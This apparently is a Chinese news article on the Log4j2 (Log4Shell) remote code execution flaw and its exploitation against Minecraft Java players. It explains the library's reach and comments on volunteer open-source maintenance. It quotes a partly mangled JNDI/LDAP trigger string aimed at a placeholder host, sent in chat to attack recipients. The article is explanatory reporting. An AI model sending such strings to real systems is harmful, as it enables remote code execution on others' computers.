文章图片
文章图片
12月9日晚 , 根据360安全卫士服务号披露 , 开源项目Apache Log4j2存在的一个远程代码执行漏洞 , 其中细节被公开 , 很多黑客伺机开始攻击各种商业项目 。
log4j由于log4j 是java生态中非常非常基础的一个日志库 , 可以说是到“水电煤”级别的库 。 JAVA的很多组件都会依赖、使用这个库进行日志写入 。
【apache|元宇宙概念游戏“我的世界”遭到由漏洞引起的网络攻击】目前 Apache Solr、Apache Struts2、Apache Druid、Apache Flink 等众多组件及大型应用均已经受到了影响 , 需尽快采取方案阻止 。
我的世界JAVA版攻击特别是我的世界JAVA版本中 , 攻击方法超级简单 , 在游戏的在线聊天中 , 发送一条带漏洞触发指令的消息 , 类似“$(其实这里没有文字 , 但是不加连这文章都会报错){jndi:ldap://{.http://xxxxxxxxxxxxxx”就可以对收到这条消息的用户发起攻击 。
截止目前 , 根据360观测到的数据 , “我的世界”数十万用户被入侵 。 因触发简单、攻击难度低、而首当其冲 。
老斜说log4j这个库不是大企业开发的 , 而且是免费开源 , 它后续的维护和升级都是一群为爱发电的开发者在那里维护升级的 。
所以讲真的 , 这群开发者也没有法律义务去修复好这个漏洞 。 这事也给普通开发者敲一下警钟 , 免费开源是很香 , 但是一定要做好隔离和熔断 。 不然后果不堪设想 。
- 亿美元|美国 AT&T 赢得 3.45GHz 频段 5G 网络竞标,耗资 90 亿美元
- 芯片|上市仅4个月,跌价1000元,微云台主摄+6nm芯片+4400mAh
- 攻克|打破日本垄断!售价7亿元的设备被中企攻克,已开始量产
- CPU|元宇宙+高端制造+人工智能!公司已投高科技超100亿,股价仅3元
- 红米手机|天玑1200手机将升级换代?红米真我两款机型降价,最低1599元
- 华为鸿蒙系统|华为偷偷上架新机,鸿蒙系统+5000mAh大电池,仅售1399元
- 苹果|最具性价比的苹果手机来了,降价2120元,iPhone12已跌至冰点价
- 苹果|从5499元跌至3399元,苹果A14+IP68防水,旧款iPhone加速清仓
- 小米科技|从4999跌至2889元,2K曲面屏+IP68防水,小米老款旗舰售价大跳水
- 骁龙855|从3499元跌至1190元,5000mAh+骁龙855,适合玩游戏